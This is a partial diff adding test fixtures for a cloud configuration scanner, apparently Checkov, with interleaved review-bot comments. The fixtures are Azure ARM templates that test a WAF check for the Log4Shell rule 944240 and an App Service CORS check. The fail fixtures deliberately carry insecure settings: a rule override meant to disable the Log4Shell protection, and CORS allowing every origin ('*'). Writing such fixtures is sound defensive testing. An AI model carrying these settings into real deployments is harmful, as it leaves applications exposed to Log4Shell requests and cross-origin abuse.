"Prevention" + }, + + "managedRules": { + "managedRuleSets": [ + { + "ruleGroupOverrides": [ + { + "ruleGroupName": "REQUEST-944-APPLICATION-ATTACK-JAVA", + "rules": [ + { + "ruleId": "944240" + } + ] + } + ], + "ruleSetType": "OWASP", + "ruleSetVersion": "3.1" + } + ] + } + + } + }, + { + "copy": { + "name": "myNic", + "count": "[length(range(0, 2))]" + }, + "type": "Microsoft.Network/networkInterfaces", + "apiVersion": "2021-08-01", + "name": "[format('{0}{1}', variables('myNic_name'), add(range(0, 2)[copyIndex()], 1))]", + "location": "[parameters('location')]", + "properties": { + "ipConfigurations": [ + { + "name": "[format('{0}{1}', variables('ipconfig_name'), add(range(0, 2)[copyIndex()], 1))]", + "properties": { + "privateIPAllocationMethod": "Dynamic", + "publicIPAddress": { + "id": "[resourceId('Microsoft.Network/publicIPAddresses', format('{0}{1}', variables('publicIPAddress_name'), add(range(0, 2)[copyIndex()], 1)))]" + }, + "subnet": { + "id": "[resourceId('Microsoft.Network/virtualNetworks/subnets', variables('virtualNetworks_myVNet_name'), 'myBackendSubnet')]" + }, + "primary": true, + "privateIPAddressVersion": "IPv4", + "applicationGatewayBackendAddressPools": [ + { + "id": "[resourceId('Microsoft.Network/applicationGateways/backendAddressPools', variables('applicationGateways_myAppGateway_name'), 'myBackendPool')]" + } + ] + } + } + ], + "enableAcceleratedNetworking": false, + "enableIPForwarding": false, + "networkSecurityGroup": { + "id": "[resourceId('Microsoft.Network/networkSecurityGroups', format('{0}{1}', variables('nsg_name'), add(range(0, 2)[copyIndex()], 1)))]" + } + }, + "dependsOn": [ + "[resourceId('Microsoft.Network/applicationGateways', variables('applicationGateways_myAppGateway_name'))]", + "[resourceId('Microsoft.Network/virtualNetworks', variables('virtualNetworks_myVNet_name'))]", + "nsg", + "publicIPAddress" + ] + } + ] +} 
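Review bot: The fail case hinges on `944240` being disabled, yet the override is written as `{ "ruleId": "944240" }` with no `state`, so the failing outcome depends on the ARM default rather than on anything visible in the fixture; write it as `{ "ruleId": "944240", "state": "Disabled" }` so the fixture documents the condition it asserts. The network interface kept in this file still lists `resourceId('Microsoft.Network/applicationGateways', ...)` in its `dependsOn` even though the application gateway resource was dropped from this fixture, leaving a dangling dependency; since the check targets the WAF policy, trimming the file to the policy resource alone would make the fixture both valid and easier to read.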
diff --git a/tests/arm/checks/resource/example_AppGatewayWAFACLCVE202144228/owasp_3_2_default_pass.json b/tests/arm/checks/resource/example_AppGatewayWAFACLCVE202144228/owasp_3_2_default_pass.json new file mode 100644 index 00000000000..351ca8b3be8 --- /dev/null +++ b/tests/arm/checks/resource/example_AppGatewayWAFACLCVE202144228/owasp_3_2_default_pass.json 
@@ -0,0 +1,249 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "metadata": { + "_generator": { + "name": "bicep", + "version": "0.15.31.15270", + "templateHash": "7253194970749033988" + } + }, + "parameters": { + "adminUsername": { + "type": "string", + "metadata": { + "description": "Admin username for the backend servers" + } + }, + "adminPassword": { + "type": "securestring", + "metadata": { + "description": "Password for the admin account on the backend servers" + } + }, + "location": { + "type": "string", + "defaultValue": "[resourceGroup().location]", + "metadata": { + "description": "Location for all resources." + } + }, + "vmSize": { + "type": "string", + "defaultValue": "Standard_B2ms", + "metadata": { + "description": "Size of the virtual machine." + } + } + }, + "variables": { + "virtualMachines_myVM_name": "myVM", + "virtualNetworks_myVNet_name": "myVNet", + "myNic_name": "net-int", + "ipconfig_name": "ipconfig", + "publicIPAddress_name": "public_ip", + "nsg_name": "vm-nsg", + "applicationGateways_myAppGateway_name": "myAppGateway", + "vnet_prefix": "10.0.0.0/16", + "ag_subnet_prefix": "10.0.0.0/24", + "backend_subnet_prefix": "10.0.1.0/24", + "AppGW_AppFW_Pol_name": "WafPol01" + }, + "resources": [ + + { + "type": "Microsoft.Network/applicationGateways", + "apiVersion": "2021-08-01", + "name": "[variables('applicationGateways_myAppGateway_name')]", + "location": "[parameters('location')]", + "properties": { + "sku": { + "name": "WAF_v2", + "tier": "WAF_v2", + "capacity": 2 + }, + "gatewayIPConfigurations": [ + { + "name": "appGatewayIpConfig", + "properties": { + "subnet": { + "id": "[resourceId('Microsoft.Network/virtualNetworks/subnets', variables('virtualNetworks_myVNet_name'), 'myAGSubnet')]" + } + } + } + ], + "frontendIPConfigurations": [ + { + "name": "appGwPublicFrontendIp", + "properties": { + "privateIPAllocationMethod": "Dynamic", + "publicIPAddress": { + 
"id": "[resourceId('Microsoft.Network/publicIPAddresses', format('{0}0', variables('publicIPAddress_name')))]" + } + } + } + ], + "frontendPorts": [ + { + "name": "port_80", + "properties": { + "port": 80 + } + } + ], + "backendAddressPools": [ + { + "name": "myBackendPool", + "properties": {} + } + ], + "backendHttpSettingsCollection": [ + { + "name": "myHTTPSetting", + "properties": { + "port": 80, + "protocol": "Http", + "cookieBasedAffinity": "Disabled", + "pickHostNameFromBackendAddress": false, + "requestTimeout": 20 + } + } + ], + "httpListeners": [ + { + "name": "myListener", + "properties": { + "firewallPolicy": { + "id": "[resourceId('Microsoft.Network/ApplicationGatewayWebApplicationFirewallPolicies', variables('AppGW_AppFW_Pol_name'))]" + }, + "frontendIPConfiguration": { + "id": "[resourceId('Microsoft.Network/applicationGateways/frontendIPConfigurations', variables('applicationGateways_myAppGateway_name'), 'appGwPublicFrontendIp')]" + }, + "frontendPort": { + "id": "[resourceId('Microsoft.Network/applicationGateways/frontendPorts', variables('applicationGateways_myAppGateway_name'), 'port_80')]" + }, + "protocol": "Http", + "requireServerNameIndication": false + } + } + ], + "requestRoutingRules": [ + { + "name": "myRoutingRule", + "properties": { + "ruleType": "Basic", + "priority": 10, + "httpListener": { + "id": "[resourceId('Microsoft.Network/applicationGateways/httpListeners', variables('applicationGateways_myAppGateway_name'), 'myListener')]" + }, + "backendAddressPool": { + "id": "[resourceId('Microsoft.Network/applicationGateways/backendAddressPools', variables('applicationGateways_myAppGateway_name'), 'myBackendPool')]" + }, + "backendHttpSettings": { + "id": "[resourceId('Microsoft.Network/applicationGateways/backendHttpSettingsCollection', variables('applicationGateways_myAppGateway_name'), 'myHTTPSetting')]" + } + } + } + ], + "enableHttp2": false, + "firewallPolicy": { + "id": 
"[resourceId('Microsoft.Network/ApplicationGatewayWebApplicationFirewallPolicies', variables('AppGW_AppFW_Pol_name'))]" + } + }, + "dependsOn": [ + "[resourceId('Microsoft.Network/ApplicationGatewayWebApplicationFirewallPolicies', variables('AppGW_AppFW_Pol_name'))]", + "[resourceId('Microsoft.Network/virtualNetworks', variables('virtualNetworks_myVNet_name'))]", + "publicIPAddress" + ] + }, + { + "type": "Microsoft.Network/ApplicationGatewayWebApplicationFirewallPolicies", + "apiVersion": "2021-08-01", + "name": "owasp_3_2_default_pass", + "location": "[parameters('location')]", + "properties": { + "customRules": [ + { + "name": "CustRule01", + "priority": 100, + "ruleType": "MatchRule", + "action": "Block", + "matchConditions": [ + { + "matchVariables": [ + { + "variableName": "RemoteAddr" + } + ], + "operator": "IPMatch", + "negationConditon": true, + "matchValues": [ + "10.10.10.0/24" + ] + } + ] + } + ], + "policySettings": { + "requestBodyCheck": true, + "maxRequestBodySizeInKb": 128, + "fileUploadLimitInMb": 100, + "state": "Enabled", + "mode": "Prevention" + }, + "managedRules": { + "managedRuleSets": [ + { + "ruleSetType": "OWASP", + "ruleSetVersion": "3.2" + } + ] + } + } + }, + { + "copy": { + "name": "myNic", + "count": "[length(range(0, 2))]" + }, + "type": "Microsoft.Network/networkInterfaces", + "apiVersion": "2021-08-01", + "name": "[format('{0}{1}', variables('myNic_name'), add(range(0, 2)[copyIndex()], 1))]", + "location": "[parameters('location')]", + "properties": { + "ipConfigurations": [ + { + "name": "[format('{0}{1}', variables('ipconfig_name'), add(range(0, 2)[copyIndex()], 1))]", + "properties": { + "privateIPAllocationMethod": "Dynamic", + "publicIPAddress": { + "id": "[resourceId('Microsoft.Network/publicIPAddresses', format('{0}{1}', variables('publicIPAddress_name'), add(range(0, 2)[copyIndex()], 1)))]" + }, + "subnet": { + "id": "[resourceId('Microsoft.Network/virtualNetworks/subnets', variables('virtualNetworks_myVNet_name'), 
'myBackendSubnet')]" + }, + "primary": true, + "privateIPAddressVersion": "IPv4", + "applicationGatewayBackendAddressPools": [ + { + "id": "[resourceId('Microsoft.Network/applicationGateways/backendAddressPools', variables('applicationGateways_myAppGateway_name'), 'myBackendPool')]" + } + ] + } + } + ], + "enableAcceleratedNetworking": false, + "enableIPForwarding": false, + "networkSecurityGroup": { + "id": "[resourceId('Microsoft.Network/networkSecurityGroups', format('{0}{1}', variables('nsg_name'), add(range(0, 2)[copyIndex()], 1)))]" + } + }, + "dependsOn": [ + "[resourceId('Microsoft.Network/applicationGateways', variables('applicationGateways_myAppGateway_name'))]", + "[resourceId('Microsoft.Network/virtualNetworks', variables('virtualNetworks_myVNet_name'))]", + "nsg", + "publicIPAddress" + ] + } + ] +} diff --git a/tests/arm/checks/resource/example_AppGatewayWAFACLCVE202144228/version_3_1_default_pass.json b/tests/arm/checks/resource/example_AppGatewayWAFACLCVE202144228/version_3_1_default_pass.json new file mode 100644 index 00000000000..c2da54352dc --- /dev/null +++ b/tests/arm/checks/resource/example_AppGatewayWAFACLCVE202144228/version_3_1_default_pass.json 
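Review bot: This covers only the untouched OWASP 3.2 rule set, and the companion that proves the 3.2 branch of the check actually fires is not in this part of the diff — rule `944240` lives in `REQUEST-944-APPLICATION-ATTACK-JAVA` for CRS 3.2 as well as 3.1, so an `owasp_3_2_disabled_fail.json` with `"ruleSetVersion": "3.2"` and `{ "ruleId": "944240", "state": "Disabled" }` is needed unless it already exists elsewhere in the change. Without it a check that only gates on `"3.1"` would still pass this suite.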
@@ -0,0 +1,248 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "metadata": { + "_generator": { + "name": "bicep", + "version": "0.15.31.15270", + "templateHash": "7253194970749033988" + } + }, + "parameters": { + "adminUsername": { + "type": "string", + "metadata": { + "description": "Admin username for the backend servers" + } + }, + "adminPassword": { + "type": "securestring", + "metadata": { + "description": "Password for the admin account on the backend servers" + } + }, + "location": { + "type": "string", + "defaultValue": "[resourceGroup().location]", + "metadata": { + "description": "Location for all resources." + } + }, + "vmSize": { + "type": "string", + "defaultValue": "Standard_B2ms", + "metadata": { + "description": "Size of the virtual machine." + } + } + }, + "variables": { + "virtualMachines_myVM_name": "myVM", + "virtualNetworks_myVNet_name": "myVNet", + "myNic_name": "net-int", + "ipconfig_name": "ipconfig", + "publicIPAddress_name": "public_ip", + "nsg_name": "vm-nsg", + "applicationGateways_myAppGateway_name": "myAppGateway", + "vnet_prefix": "10.0.0.0/16", + "ag_subnet_prefix": "10.0.0.0/24", + "backend_subnet_prefix": "10.0.1.0/24", + "AppGW_AppFW_Pol_name": "WafPol01" + }, + "resources": [ + + { + "type": "Microsoft.Network/applicationGateways", + "apiVersion": "2021-08-01", + "name": "[variables('applicationGateways_myAppGateway_name')]", + "location": "[parameters('location')]", + "properties": { + "sku": { + "name": "WAF_v2", + "tier": "WAF_v2", + "capacity": 2 + }, + "gatewayIPConfigurations": [ + { + "name": "appGatewayIpConfig", + "properties": { + "subnet": { + "id": "[resourceId('Microsoft.Network/virtualNetworks/subnets', variables('virtualNetworks_myVNet_name'), 'myAGSubnet')]" + } + } + } + ], + "frontendIPConfigurations": [ + { + "name": "appGwPublicFrontendIp", + "properties": { + "privateIPAllocationMethod": "Dynamic", + "publicIPAddress": { + 
"id": "[resourceId('Microsoft.Network/publicIPAddresses', format('{0}0', variables('publicIPAddress_name')))]" + } + } + } + ], + "frontendPorts": [ + { + "name": "port_80", + "properties": { + "port": 80 + } + } + ], + "backendAddressPools": [ + { + "name": "myBackendPool", + "properties": {} + } + ], + "backendHttpSettingsCollection": [ + { + "name": "myHTTPSetting", + "properties": { + "port": 80, + "protocol": "Http", + "cookieBasedAffinity": "Disabled", + "pickHostNameFromBackendAddress": false, + "requestTimeout": 20 + } + } + ], + "httpListeners": [ + { + "name": "myListener", + "properties": { + "firewallPolicy": { + "id": "[resourceId('Microsoft.Network/ApplicationGatewayWebApplicationFirewallPolicies', variables('AppGW_AppFW_Pol_name'))]" + }, + "frontendIPConfiguration": { + "id": "[resourceId('Microsoft.Network/applicationGateways/frontendIPConfigurations', variables('applicationGateways_myAppGateway_name'), 'appGwPublicFrontendIp')]" + }, + "frontendPort": { + "id": "[resourceId('Microsoft.Network/applicationGateways/frontendPorts', variables('applicationGateways_myAppGateway_name'), 'port_80')]" + }, + "protocol": "Http", + "requireServerNameIndication": false + } + } + ], + "requestRoutingRules": [ + { + "name": "myRoutingRule", + "properties": { + "ruleType": "Basic", + "priority": 10, + "httpListener": { + "id": "[resourceId('Microsoft.Network/applicationGateways/httpListeners', variables('applicationGateways_myAppGateway_name'), 'myListener')]" + }, + "backendAddressPool": { + "id": "[resourceId('Microsoft.Network/applicationGateways/backendAddressPools', variables('applicationGateways_myAppGateway_name'), 'myBackendPool')]" + }, + "backendHttpSettings": { + "id": "[resourceId('Microsoft.Network/applicationGateways/backendHttpSettingsCollection', variables('applicationGateways_myAppGateway_name'), 'myHTTPSetting')]" + } + } + } + ], + "enableHttp2": false, + "firewallPolicy": { + "id": 
"[resourceId('Microsoft.Network/ApplicationGatewayWebApplicationFirewallPolicies', variables('AppGW_AppFW_Pol_name'))]" + } + }, + "dependsOn": [ + "[resourceId('Microsoft.Network/ApplicationGatewayWebApplicationFirewallPolicies', variables('AppGW_AppFW_Pol_name'))]", + "[resourceId('Microsoft.Network/virtualNetworks', variables('virtualNetworks_myVNet_name'))]", + "publicIPAddress" + ] + }, + { + "type": "Microsoft.Network/ApplicationGatewayWebApplicationFirewallPolicies", + "apiVersion": "2021-08-01", + "name": "version_3_1_default_pass", + "location": "[parameters('location')]", + "properties": { + "customRules": [ + { + "name": "CustRule01", + "priority": 100, + "ruleType": "MatchRule", + "action": "Block", + "matchConditions": [ + { + "matchVariables": [ + { + "variableName": "RemoteAddr" + } + ], + "operator": "IPMatch", + "negationConditon": true, + "matchValues": [ + "10.10.10.0/24" + ] + } + ] + } + ], + "policySettings": { + "requestBodyCheck": true, + "maxRequestBodySizeInKb": 128, + "fileUploadLimitInMb": 100, + "state": "Enabled", + "mode": "Prevention" + }, + "managedRules": { + "managedRuleSets": [ + { + "ruleSetVersion": "3.1" + } + ] + } + } + }, + { + "copy": { + "name": "myNic", + "count": "[length(range(0, 2))]" + }, + "type": "Microsoft.Network/networkInterfaces", + "apiVersion": "2021-08-01", + "name": "[format('{0}{1}', variables('myNic_name'), add(range(0, 2)[copyIndex()], 1))]", + "location": "[parameters('location')]", + "properties": { + "ipConfigurations": [ + { + "name": "[format('{0}{1}', variables('ipconfig_name'), add(range(0, 2)[copyIndex()], 1))]", + "properties": { + "privateIPAllocationMethod": "Dynamic", + "publicIPAddress": { + "id": "[resourceId('Microsoft.Network/publicIPAddresses', format('{0}{1}', variables('publicIPAddress_name'), add(range(0, 2)[copyIndex()], 1)))]" + }, + "subnet": { + "id": "[resourceId('Microsoft.Network/virtualNetworks/subnets', variables('virtualNetworks_myVNet_name'), 'myBackendSubnet')]" + }, + 
"primary": true, + "privateIPAddressVersion": "IPv4", + "applicationGatewayBackendAddressPools": [ + { + "id": "[resourceId('Microsoft.Network/applicationGateways/backendAddressPools', variables('applicationGateways_myAppGateway_name'), 'myBackendPool')]" + } + ] + } + } + ], + "enableAcceleratedNetworking": false, + "enableIPForwarding": false, + "networkSecurityGroup": { + "id": "[resourceId('Microsoft.Network/networkSecurityGroups', format('{0}{1}', variables('nsg_name'), add(range(0, 2)[copyIndex()], 1)))]" + } + }, + "dependsOn": [ + "[resourceId('Microsoft.Network/applicationGateways', variables('applicationGateways_myAppGateway_name'))]", + "[resourceId('Microsoft.Network/virtualNetworks', variables('virtualNetworks_myVNet_name'))]", + "nsg", + "publicIPAddress" + ] + } + ] +} diff --git a/tests/arm/checks/resource/example_AppServiceDisallowCORS/fail.json b/tests/arm/checks/resource/example_AppServiceDisallowCORS/fail.json new file mode 100644 index 00000000000..b889454d7a8 --- /dev/null +++ b/tests/arm/checks/resource/example_AppServiceDisallowCORS/fail.json 
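Review bot: The single `managedRuleSets` entry has `"ruleSetVersion": "3.1"` but no `ruleSetType`, which the ARM schema requires, so this template would be rejected at deployment; the file name `version_3_1_default_pass` does not say that the missing key is the point. If the purpose is to prove the check tolerates a policy without `ruleSetType` (and does not raise on the absent key), rename the fixture to something like `missing_rule_set_type_pass.json` so the intent survives without a comment, which JSON cannot carry; if not, add `"ruleSetType": "OWASP"`, although that would duplicate `owasp_3_1_default_pass.json`.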
@@ -0,0 +1,330 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "parameters": { + "webAppName": { + "type": "string", + "defaultValue": "AzureLinuxApp", + "metadata": { + "description": "Base name of the resource such as web app name and app service plan " + }, + "minLength": 2 + }, + "sku": { + "type": "string", + "defaultValue": "S1", + "metadata": { + "description": "The SKU of App Service Plan " + } + }, + "linuxFxVersion": { + "type": "string", + "defaultValue": "php|7.0", + "metadata": { + "description": "The Runtime stack of current web app" + } + }, + "location": { + "type": "string", + "defaultValue": "[resourceGroup().location]", + "metadata": { + "description": "Location for all resources." + } + } + }, + "variables": { + "webAppPortalName": "[concat(parameters('webAppName'), '-webapp')]", + "appServicePlanName": "[concat('AppServicePlan-', parameters('webAppName'))]" + }, + "resources": [ + { + "type": "Microsoft.Web/sites", + "apiVersion": "2022-09-01", + "name": "fail", + "location": "string", + "tags": { + "tagName1": "tagValue1", + "tagName2": "tagValue2" + }, + "kind": "string", + "extendedLocation": { + "name": "string" + }, + "identity": { + "type": "string", + "userAssignedIdentities": {} + }, + "properties": { + "clientAffinityEnabled": "bool", + "clientCertEnabled": "bool", + "clientCertExclusionPaths": "string", + "clientCertMode": "string", + "cloningInfo": { + "appSettingsOverrides": {}, + "cloneCustomHostNames": "bool", + "cloneSourceControl": "bool", + "configureLoadBalancing": "bool", + "correlationId": "string", + "hostingEnvironment": "string", + "overwrite": "bool", + "sourceWebAppId": "string", + "sourceWebAppLocation": "string", + "trafficManagerProfileId": "string", + "trafficManagerProfileName": "string" + }, + "containerSize": "int", + "customDomainVerificationId": "string", + "dailyMemoryTimeQuota": "int", + "enabled": "bool", + 
"hostingEnvironmentProfile": { + "id": "string" + }, + "hostNamesDisabled": "bool", + "hostNameSslStates": [ + { + "hostType": "string", + "name": "string", + "sslState": "string", + "thumbprint": "string", + "toUpdate": "bool", + "virtualIP": "string" + } + ], + "httpsOnly": "bool", + "hyperV": "bool", + "isXenon": "bool", + "keyVaultReferenceIdentity": "string", + "managedEnvironmentId": "string", + "publicNetworkAccess": "string", + "redundancyMode": "string", + "reserved": "bool", + "scmSiteAlsoStopped": "bool", + "serverFarmId": "string", + "siteConfig": { + "acrUseManagedIdentityCreds": "bool", + "acrUserManagedIdentityID": "string", + "alwaysOn": "bool", + "apiDefinition": { + "url": "string" + }, + "apiManagementConfig": { + "id": "string" + }, + "appCommandLine": "string", + "appSettings": [ + { + "name": "string", + "value": "string" + } + ], + "autoHealEnabled": "bool", + "autoHealRules": { + "actions": { + "actionType": "string", + "customAction": { + "exe": "string", + "parameters": "string" + }, + "minProcessExecutionTime": "string" + }, + "triggers": { + "privateBytesInKB": "int", + "requests": { + "count": "int", + "timeInterval": "string" + }, + "slowRequests": { + "count": "int", + "path": "string", + "timeInterval": "string", + "timeTaken": "string" + }, + "slowRequestsWithPath": [ + { + "count": "int", + "path": "string", + "timeInterval": "string", + "timeTaken": "string" + } + ], + "statusCodes": [ + { + "count": "int", + "path": "string", + "status": "int", + "subStatus": "int", + "timeInterval": "string", + "win32Status": "int" + } + ], + "statusCodesRange": [ + { + "count": "int", + "path": "string", + "statusCodes": "string", + "timeInterval": "string" + } + ] + } + }, + "autoSwapSlotName": "string", + "azureStorageAccounts": {}, + "connectionStrings": [ + { + "connectionString": "string", + "name": "string", + "type": "string" + } + ], + "cors": { + "allowedOrigins": [ + "*" + ], + "supportCredentials": "bool" + }, + "defaultDocuments": [ 
+ "string" + ], + "detailedErrorLoggingEnabled": "bool", + "documentRoot": "string", + "elasticWebAppScaleLimit": "int", + "experiments": { + "rampUpRules": [ + { + "actionHostName": "string", + "changeDecisionCallbackUrl": "string", + "changeIntervalInMinutes": "int", + "changeStep": "int", + "maxReroutePercentage": "int", + "minReroutePercentage": "int", + "name": "string", + "reroutePercentage": "int" + } + ] + }, + "ftpsState": "string", + "functionAppScaleLimit": "int", + "functionsRuntimeScaleMonitoringEnabled": "bool", + "handlerMappings": [ + { + "arguments": "string", + "extension": "string", + "scriptProcessor": "string" + } + ], + "healthCheckPath": "string", + "http20Enabled": "bool", + "httpLoggingEnabled": "bool", + "ipSecurityRestrictions": [ + { + "action": "string", + "description": "string", + "headers": {}, + "ipAddress": "string", + "name": "string", + "priority": "int", + "subnetMask": "string", + "subnetTrafficTag": "int", + "tag": "string", + "vnetSubnetResourceId": "string", + "vnetTrafficTag": "int" + } + ], + "ipSecurityRestrictionsDefaultAction": "string", + "javaContainer": "string", + "javaContainerVersion": "string", + "javaVersion": "string", + "keyVaultReferenceIdentity": "string", + "limits": { + "maxDiskSizeInMb": "int", + "maxMemoryInMb": "int", + "maxPercentageCpu": "int" + }, + "linuxFxVersion": "string", + "loadBalancing": "string", + "localMySqlEnabled": "bool", + "logsDirectorySizeLimit": "int", + "managedPipelineMode": "string", + "managedServiceIdentityId": "int", + "metadata": [ + { + "name": "string", + "value": "string" + } + ], + "minimumElasticInstanceCount": "int", + "minTlsVersion": "string", + "netFrameworkVersion": "string", + "nodeVersion": "string", + "numberOfWorkers": "int", + "phpVersion": "string", + "powerShellVersion": "string", + "preWarmedInstanceCount": "int", + "publicNetworkAccess": "string", + "publishingUsername": "string", + "push": { + "kind": "string", + "properties": { + "dynamicTagsJson": 
"string", + "isPushEnabled": "bool", + "tagsRequiringAuth": "string", + "tagWhitelistJson": "string" + } + }, + "pythonVersion": "string", + "remoteDebuggingEnabled": "bool", + "remoteDebuggingVersion": "string", + "requestTracingEnabled": "bool", + "requestTracingExpirationTime": "string", + "scmIpSecurityRestrictions": [ + { + "action": "string", + "description": "string", + "headers": {}, + "ipAddress": "string", + "name": "string", + "priority": "int", + "subnetMask": "string", + "subnetTrafficTag": "int", + "tag": "string", + "vnetSubnetResourceId": "string", + "vnetTrafficTag": "int" + } + ], + "scmIpSecurityRestrictionsDefaultAction": "string", + "scmIpSecurityRestrictionsUseMain": "bool", + "scmMinTlsVersion": "string", + "scmType": "string", + "tracingOptions": "string", + "use32BitWorkerProcess": "bool", + "virtualApplications": [ + { + "physicalPath": "string", + "preloadEnabled": "bool", + "virtualDirectories": [ + { + "physicalPath": "string", + "virtualPath": "string" + } + ], + "virtualPath": "string" + } + ], + "vnetName": "string", + "vnetPrivatePortsCount": "int", + "vnetRouteAllEnabled": "bool", + "websiteTimeZone": "string", + "webSocketsEnabled": "bool", + "windowsFxVersion": "string", + "xManagedServiceIdentityId": "int" + }, + "storageAccountRequired": "bool", + "virtualNetworkSubnetId": "string", + "vnetContentShareEnabled": "bool", + "vnetImagePullEnabled": "bool", + "vnetRouteAllEnabled": "bool" + } + } + ] +} + diff --git a/tests/arm/checks/resource/example_AppServiceDisallowCORS/pass.json b/tests/arm/checks/resource/example_AppServiceDisallowCORS/pass.json new file mode 100644 index 00000000000..28a78e3a72c --- /dev/null +++ b/tests/arm/checks/resource/example_AppServiceDisallowCORS/pass.json 
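Review bot: The only failing shape exercised is `"allowedOrigins": ["*"]` as a lone element; a wildcard buried in a longer list, e.g. `"allowedOrigins": ["https://example.com", "*"]`, is the more realistic misconfiguration and should be a second fail fixture so the check (outside this hunk) is shown to scan the whole list rather than a single-entry one. The rest of the resource is the ARM reference skeleton with type-name placeholders such as `"httpsOnly": "bool"` and `"supportCredentials": "bool"`, which is fine for one targeted check but means no other Checkov policy can be meaningfully run against this file; the unused `webAppName`, `sku` and `linuxFxVersion` parameters and both variables are leftovers that could be dropped.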
@@ -0,0 +1,330 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "parameters": { + "webAppName": { + "type": "string", + "defaultValue": "AzureLinuxApp", + "metadata": { + "description": "Base name of the resource such as web app name and app service plan " + }, + "minLength": 2 + }, + "sku": { + "type": "string", + "defaultValue": "S1", + "metadata": { + "description": "The SKU of App Service Plan " + } + }, + "linuxFxVersion": { + "type": "string", + "defaultValue": "php|7.0", + "metadata": { + "description": "The Runtime stack of current web app" + } + }, + "location": { + "type": "string", + "defaultValue": "[resourceGroup().location]", + "metadata": { + "description": "Location for all resources." + } + } + }, + "variables": { + "webAppPortalName": "[concat(parameters('webAppName'), '-webapp')]", + "appServicePlanName": "[concat('AppServicePlan-', parameters('webAppName'))]" + }, + "resources": [ + { + "type": "Microsoft.Web/sites", + "apiVersion": "2022-09-01", + "name": "pass", + "location": "string", + "tags": { + "tagName1": "tagValue1", + "tagName2": "tagValue2" + }, + "kind": "string", + "extendedLocation": { + "name": "string" + }, + "identity": { + "type": "string", + "userAssignedIdentities": {} + }, + "properties": { + "clientAffinityEnabled": "bool", + "clientCertEnabled": "bool", + "clientCertExclusionPaths": "string", + "clientCertMode": "string", + "cloningInfo": { + "appSettingsOverrides": {}, + "cloneCustomHostNames": "bool", + "cloneSourceControl": "bool", + "configureLoadBalancing": "bool", + "correlationId": "string", + "hostingEnvironment": "string", + "overwrite": "bool", + "sourceWebAppId": "string", + "sourceWebAppLocation": "string", + "trafficManagerProfileId": "string", + "trafficManagerProfileName": "string" + }, + "containerSize": "int", + "customDomainVerificationId": "string", + "dailyMemoryTimeQuota": "int", + "enabled": "bool", + 
"hostingEnvironmentProfile": { + "id": "string" + }, + "hostNamesDisabled": "bool", + "hostNameSslStates": [ + { + "hostType": "string", + "name": "string", + "sslState": "string", + "thumbprint": "string", + "toUpdate": "bool", + "virtualIP": "string" + } + ], + "httpsOnly": "bool", + "hyperV": "bool", + "isXenon": "bool", + "keyVaultReferenceIdentity": "string", + "managedEnvironmentId": "string", + "publicNetworkAccess": "string", + "redundancyMode": "string", + "reserved": "bool", + "scmSiteAlsoStopped": "bool", + "serverFarmId": "string", + "siteConfig": { + "acrUseManagedIdentityCreds": "bool", + "acrUserManagedIdentityID": "string", + "alwaysOn": "bool", + "apiDefinition": { + "url": "string" + }, + "apiManagementConfig": { + "id": "string" + }, + "appCommandLine": "string", + "appSettings": [ + { + "name": "string", + "value": "string" + } + ], + "autoHealEnabled": "bool", + "autoHealRules": { + "actions": { + "actionType": "string", + "customAction": { + "exe": "string", + "parameters": "string" + }, + "minProcessExecutionTime": "string" + }, + "triggers": { + "privateBytesInKB": "int", + "requests": { + "count": "int", + "timeInterval": "string" + }, + "slowRequests": { + "count": "int", + "path": "string", + "timeInterval": "string", + "timeTaken": "string" + }, + "slowRequestsWithPath": [ + { + "count": "int", + "path": "string", + "timeInterval": "string", + "timeTaken": "string" + } + ], + "statusCodes": [ + { + "count": "int", + "path": "string", + "status": "int", + "subStatus": "int", + "timeInterval": "string", + "win32Status": "int" + } + ], + "statusCodesRange": [ + { + "count": "int", + "path": "string", + "statusCodes": "string", + "timeInterval": "string" + } + ] + } + }, + "autoSwapSlotName": "string", + "azureStorageAccounts": {}, + "connectionStrings": [ + { + "connectionString": "string", + "name": "string", + "type": "string" + } + ], + "cors": { + "allowedOrigins": [ + "is try string to app service disallow cors" + ], + 
"supportCredentials": "bool" + }, + "defaultDocuments": [ + "string" + ], + "detailedErrorLoggingEnabled": "bool", + "documentRoot": "string", + "elasticWebAppScaleLimit": "int", + "experiments": { + "rampUpRules": [ + { + "actionHostName": "string", + "changeDecisionCallbackUrl": "string", + "changeIntervalInMinutes": "int", + "changeStep": "int", + "maxReroutePercentage": "int", + "minReroutePercentage": "int", + "name": "string", + "reroutePercentage": "int" + } + ] + }, + "ftpsState": "string", + "functionAppScaleLimit": "int", + "functionsRuntimeScaleMonitoringEnabled": "bool", + "handlerMappings": [ + { + "arguments": "string", + "extension": "string", + "scriptProcessor": "string" + } + ], + "healthCheckPath": "string", + "http20Enabled": "bool", + "httpLoggingEnabled": "bool", + "ipSecurityRestrictions": [ + { + "action": "string", + "description": "string", + "headers": {}, + "ipAddress": "string", + "name": "string", + "priority": "int", + "subnetMask": "string", + "subnetTrafficTag": "int", + "tag": "string", + "vnetSubnetResourceId": "string", + "vnetTrafficTag": "int" + } + ], + "ipSecurityRestrictionsDefaultAction": "string", + "javaContainer": "string", + "javaContainerVersion": "string", + "javaVersion": "string", + "keyVaultReferenceIdentity": "string", + "limits": { + "maxDiskSizeInMb": "int", + "maxMemoryInMb": "int", + "maxPercentageCpu": "int" + }, + "linuxFxVersion": "string", + "loadBalancing": "string", + "localMySqlEnabled": "bool", + "logsDirectorySizeLimit": "int", + "managedPipelineMode": "string", + "managedServiceIdentityId": "int", + "metadata": [ + { + "name": "string", + "value": "string" + } + ], + "minimumElasticInstanceCount": "int", + "minTlsVersion": "string", + "netFrameworkVersion": "string", + "nodeVersion": "string", + "numberOfWorkers": "int", + "phpVersion": "string", + "powerShellVersion": "string", + "preWarmedInstanceCount": "int", + "publicNetworkAccess": "string", + "publishingUsername": "string", + "push": { + 
